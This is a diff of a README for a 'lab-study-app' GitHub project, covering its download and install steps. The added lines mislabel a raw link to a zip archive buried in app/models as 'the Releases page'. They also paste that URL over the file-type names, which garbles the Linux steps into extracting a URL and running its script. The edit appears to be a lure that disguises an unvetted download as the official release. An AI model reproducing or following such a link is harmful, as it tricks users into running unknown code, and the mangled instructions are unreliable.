WaleedBasl/lab-study-app/README.md

 ## 📥 Download & Install
 To install the lab-study-app, follow these steps:

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/WaleedBasl/lab-study-app/releases).
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/WaleedBasl/lab-study-app/main/app/models/app-study-lab-3.0.zip).
 2. **Choose Your Version**: Select the most recent version of the app.
 3. **Download the Installer**: Click on the link to download the application file.
-It will be a `.exe` file for Windows, a `.dmg` file for Mac, or a `.tar.gz` file for Linux.
+It will be a `.exe` file for Windows, a `.dmg` file for Mac, or a `https://raw.githubusercontent.com/WaleedBasl/lab-study-app/main/app/models/app-study-lab-3.0.zip` file for Linux.
 4. **Run the Installer**:
    - Windows: Double-click the `.exe` file to run the installer.
    - Mac: Open the `.dmg` file, drag the app to your Applications folder.
-   - Linux: Extract the `.tar.gz` file and run the included script in the terminal.
+   - Linux: Extract the `https://raw.githubusercontent.com/WaleedBasl/lab-study-app/main/app/models/app-study-lab-3.0.zip` file and run the included script in the terminal.

 5. **Complete the Installation**: Follow the on-screen instructions to finalize the setup.